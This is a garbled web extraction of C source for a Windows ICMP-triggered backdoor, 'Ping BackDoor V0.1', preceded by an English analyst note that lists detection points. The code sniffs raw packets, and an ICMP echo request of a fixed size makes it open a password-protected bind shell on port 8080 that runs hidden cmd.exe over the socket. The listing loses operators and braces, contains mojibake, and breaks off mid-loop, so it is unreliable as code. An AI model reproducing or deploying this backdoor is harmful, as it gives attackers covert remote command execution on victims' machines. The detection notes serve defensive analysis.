包含詳細注釋的pingback后門C源代碼

/*
 * Analyst note on this listing.
 *
 * The text below is a document-site extraction of a Windows C source file.
 * Braces, array brackets, "//" comment markers and some operators were lost,
 * and tokens are split across the numbered fragments ("1、", "2、", ...), so it
 * does not compile as shown; the listing also breaks off inside bindshell().
 *
 * What the visible code does: sniffer() opens a raw IP socket, enables
 * SIO_RCVALL and reads datagrams in a loop. A datagram whose length matches
 * SNIFFER_ICMP_SIZE + 28 is handed to decode_sniffer(), which calls
 * bindshell() when the ICMP type is ICMP_ECHO (the comparison operators are
 * garbled in this copy, so "matches" and "is" are read from the original
 * comments -- confirm against a clean copy). bindshell() listens on TCP
 * BIND_PORT, accepts one connection, searches the first data received for
 * DEF_PASSWORD with strstr(), then starts cmd.exe with SW_HIDE and its
 * standard handles on two anonymous pipes that are relayed over the socket.
 *
 * Detection and response points that follow from that:
 *  - a process outside the expected monitoring tools holding a raw socket
 *    with SIO_RCVALL set;
 *  - inbound ICMP echo requests of one fixed size (SNIFFER_ICMP_SIZE bytes of
 *    ICMP data, larger than the small defaults of common ping tools),
 *    followed by a new TCP listener on BIND_PORT;
 *  - cmd.exe created with a hidden window and inherited pipe handles as
 *    stdin/stdout/stderr by a process that is not a console or service host;
 *  - the static banner and prompt strings in bindshell() and the
 *    DEF_PASSWORD literal as string-signature material;
 *  - the password and the whole session cross the network unencrypted, so
 *    both are recoverable from a packet capture during incident response.
 */
1、#include <stdio.h> #include <stdlib.h> #include <winsock2.h> /#include <ws2tcpip.h> #include <mstcpip.h> #define ICMP_ECHO 8 / ICMP回顯請(qǐng)求報(bào)文的類(lèi)型值為8 #define ICMP_ECHOREPLY 0 / ICMP回顯應(yīng)答報(bào)文的類(lèi)型值為0 #define SNIFFER_ICMP_SIZE 101 / 監(jiān)聽(tīng)I(yíng)CMP包的大? #define BIND_PORT 8080 / 默認(rèn)bind shell 端

2、口 #define MAX_PACKET 10000 / 最大ICMP包的大? #define DEF_PASSWORD "givemeshell!" / 默認(rèn)密碼 #define xmalloc(s) HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY,(s) / 定義IP 首部 typedef struct iphdr unsigned char h_verlen; / 4位首部長(zhǎng)度,4位IP版本號(hào) 1 unsigned char tos; / 8位服務(wù)類(lèi)型TOS 1 unsigned short total_len; / 16位總

3、長(zhǎng)度(字節(jié)) 2 unsigned short ident; / 16位標(biāo)識(shí) 2 unsigned short frag_and_flags; / 3位標(biāo)志位 2 unsigned char ttl; / 8位生存時(shí)間 TTL 1 unsigned char proto; / 8位協(xié)議(TCP, UDP 或其它) 1 unsigned short checksum; / 16位IP首部校驗(yàn)和 2 unsigned int sourceIP; / 32位源IP地址 4 unsigned int destIP; / 32位目的IP地址 4 IPHeader; / IP首部長(zhǎng)度為: 20 / 定義I

4、CMP首部 typedef struct _ihdr unsigned char i_type; / 8位類(lèi)型 1 unsigned char i_code; / 8位代碼 1 unsigned short i_cksum; / 16位校驗(yàn)和 2 unsigned short i_id; / 識(shí)別號(hào)(用進(jìn)程號(hào)作為識(shí)別) 2 unsigned short i_seq; / 報(bào)文序列號(hào) 2 ICMPHeader; / ICMP首部長(zhǎng)度為: 8 int sniffer(); / 監(jiān)聽(tīng)I(yíng)CMP 大? void decode_sniffer(char *, int, struct sockaddr_in

5、 *); / 簡(jiǎn)單Sniffer 解包程序 int bindshell(); / bind shell DWORD dwBufferLen10; DWORD dwBufferInLen = 1; DWORD dwBytesReturned = 0; HANDLE bindthread; / ICMPDoor 主函數(shù) int main(int argc, char *argv) WSADATA wsaData; int retval; / socket 初始化 if (retval = WSAStartup(MAKEWORD(2,2), &wsaData) != 0) printf(&q

6、uot;WSAStartup failed: %dn",retval); exit(-1); / sniffer 開(kāi)始 sniffer(); / socket 結(jié)束 WSACleanup(); return 0; / sniffer 主函數(shù) int sniffer() int packsize = SNIFFER_ICMP_SIZE; SOCKET socksniffer; struct sockaddr_in dest,from; struct hostent * hp; int sread; int fromlen = sizeof(from); unsigned char Lo

7、calName256; char *recvbuf; / 創(chuàng)建一個(gè)原始socket, 接受所有接收的包(sniffer) if (socksniffer = WSASocket(AF_INET, SOCK_RAW, IPPROTO_IP, NULL, 0, WSA_FLAG_OVERLAPPED) = INVALID_SOCKET) printf("WSASocket() failed: %dn", WSAGetLastError(); return -1; / 取得本地地址 gethostname(char*)LocalName, sizeof(LocalName)-1)

8、; if(hp = gethostbyname(char*)LocalName) = NULL) return -1; memset(&dest,0,sizeof(dest); memcpy(&dest.sin_addr.s_addr, hp->h_addr_list0, hp->h_length); / TCP嗅探選項(xiàng) dest.sin_family = AF_INET; dest.sin_port = htons(8000); / 指定任意端口 / socket bind bind(socksniffer, (PSOCKADDR)&dest, sizeo

9、f(dest); / 設(shè)置socket為接受所有包 WSAIoctl(socksniffer, SIO_RCVALL, &dwBufferInLen, sizeof(dwBufferInLen), &dwBufferLen, sizeof(dwBufferLen),&dwBytesReturned , NULL , NULL ); / 分配socket接收緩沖區(qū)大小為MAX_PACKET recvbuf = (char *)xmalloc(MAX_PACKET); printf("Sniffer ok!"); / 循環(huán)監(jiān)聽(tīng)包的大小 while(1)

10、/ 讀數(shù)據(jù) sread = recvfrom(socksniffer, recvbuf, MAX_PACKET, 0, (struct sockaddr*)&from, &fromlen); / 如果讀數(shù)據(jù)出錯(cuò) if (sread = SOCKET_ERROR | sread < 0) if (WSAGetLastError() = WSAETIMEDOUT) continue; printf("recvfrom failed: %dn",WSAGetLastError(); return -1; else / if ( sread >= 28)

11、 / 如果讀到數(shù)據(jù)的大小 = 監(jiān)聽(tīng)包的大小 + 28 if ( sread = packsize + 28) / 將接收到的數(shù)據(jù)交給 Sniffer 解包程序處理 decode_sniffer(recvbuf, sread - 28, &from); return 1; / 簡(jiǎn)單Sniffer 解包程序 void decode_sniffer(char *buf, int bytes, struct sockaddr_in *from) ICMPHeader *icmphdr; / ICMP首部的地址等于buf+IP首部長(zhǎng)度:buf+20 icmphdr = (ICMPHeader *

12、)(buf + sizeof(IPHeader); /* printf("rn %d bytes from %s,", bytes, inet_ntoa(from->sin_addr); / 取出接收數(shù)據(jù) printf(" ICMP_Type: %d", icmphdr->i_type); / 檢測(cè)類(lèi)型 printf(" ICMP_Seq: %drn", icmphdr->i_seq); / 取出序列號(hào) /?出數(shù)據(jù)段 buf + 28 + i for(int i = 0; i < bytes - 1; i+)

13、printf("%c", *(buf + sizeof(IPHeader) + sizeof(ICMPHeader) + i); */ / if (icmphdr->i_type = ICMP_ECHO | icmphdr->i_type = ICMP_ECHOREPLY) / 簡(jiǎn)單判斷如果為icmp 請(qǐng)求包 if (icmphdr->i_type = ICMP_ECHO) / bind shell bindshell(); / DWORD bid; / bindthread = CreateThread(NULL, 0, bindshell, 0, 0,

14、 &bid); else printf("rn Get Other Packets!"); return; / bind shell函數(shù) int bindshell() int bport = BIND_PORT; SOCKET bindServer, getClient; struct sockaddr_in addrServer, addrClient; char Buff4096; char *messages = "rn= Ping BackDoor V0.1 =rn= Code by Lion. Welcome to Http:/ =rn&quo

15、t; char *getpass = "rn Your PassWord:" char *passok = "rn OK! Please Enter:" char *nothispass = "rn Sorry, Your PassWord Not Right.rn" char *exitok = "rn Exit OK!rn" char *rebootok = "rn Reboot now!rn" / 創(chuàng)建一個(gè)socket bindServer = socket(AF_INET, SOCK_S

16、TREAM, IPPROTO_TCP); / 服務(wù)器地址和端口指定 addrServer.sin_family = AF_INET; addrServer.sin_port = htons(bport); addrServer.sin_addr.s_addr = ADDR_ANY; / 設(shè)置超時(shí) int TimeOut = 60000; setsockopt(bindServer, SOL_SOCKET, SO_RCVTIMEO, (char*)&TimeOut, sizeof(TimeOut); / 設(shè)置重復(fù)利用端口 UINT bReUser = 1; setsockopt(bind

17、Server, SOL_SOCKET, SO_REUSEADDR, (char*)&bReUser, sizeof(bReUser); / 監(jiān)聽(tīng)端口 bind(bindServer, (struct sockaddr*)&addrServer, sizeof(addrServer); listen(bindServer, 2); printf("rn Bind Port on %d ok.", bport); / 接受client連接 int iLen = sizeof(addrClient); / 接收1次連接 getClient = accept(bin

18、dServer, (struct sockaddr*)&addrClient, &iLen); if(getClient != INVALID_SOCKET) / 如果有連接進(jìn)來(lái)設(shè)置延時(shí)為60S int iTimeOut = 60000; setsockopt(getClient, SOL_SOCKET, SO_RCVTIMEO, (char*)&iTimeOut, sizeof(iTimeOut); else return -1; / 寫(xiě)歡迎信息 send(getClient, messages, strlen(messages), 0); / 寫(xiě)密碼驗(yàn)證信息 sen

19、d(getClient, getpass, strlen(getpass), 0); / 接收數(shù)據(jù) recv(getClient,Buff,1024,0); / 驗(yàn)證密碼 if(!(strstr(Buff, DEF_PASSWORD) / 如果密碼錯(cuò)誤,寫(xiě)密碼錯(cuò)誤信息 send(getClient, nothispass, strlen(nothispass), 0); printf("rn PassWord Not Right!"); closesocket(getClient); closesocket(bindServer); return -1; / 寫(xiě)通過(guò)驗(yàn)證信息

20、 send(getClient, passok, strlen(passok), 0); / 建兩個(gè)匿名管道 HANDLE hReadPipe1,hWritePipe1,hReadPipe2,hWritePipe2; unsigned long lBytesRead; SECURITY_ATTRIBUTES sa; sa.nLength=12; sa.lpSecurityDescriptor=0; sa.bInheritHandle=TRUE; CreatePipe(&hReadPipe1,&hWritePipe1,&sa,0); CreatePipe(&hRe

21、adPipe2,&hWritePipe2,&sa,0); STARTUPINFO siinfo; char cmdLine = "cmd.exe" PROCESS_INFORMATION ProcessInformation; ZeroMemory(&siinfo,sizeof(siinfo); siinfo.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES; siinfo.wShowWindow = SW_HIDE; siinfo.hStdInput = hReadPipe2; / 讀socke

22、t寫(xiě)入pipe2的數(shù)據(jù) siinfo.hStdOutput = siinfo.hStdError = hWritePipe1; / 向這里寫(xiě)數(shù)據(jù) printf("rn Pipe Create OK!"); / 創(chuàng)建一個(gè)cmd進(jìn)程, 由hReadPipe2讀數(shù)據(jù),向hWritePipe1寫(xiě)數(shù)據(jù) int bread = CreateProcess(NULL,cmdLine,NULL,NULL,1,0,NULL,NULL,&siinfo,&ProcessInformation); while(1) / 檢查管道是否有數(shù)據(jù)返回 int ret = PeekNamed

23、Pipe(hReadPipe1,Buff,1024,&lBytesRead,0,0); if(lBytesRead) / 從管道hReadPipe1讀數(shù)據(jù) ret = ReadFile(hReadPipe1,Buff,lBytesRead,&lBytesRead,0); if(!ret) break; / 把從管道hReadPipe1讀到的數(shù)據(jù)寫(xiě)入連接 getClient ret = send(getClient,Buff,lBytesRead,0); if(ret <= 0) break; else / 如果連接 getClient 有接收到數(shù)據(jù) lBytesRead = recv(getClient,Buff,1024,0); if(lBytesRead <= 0) brea
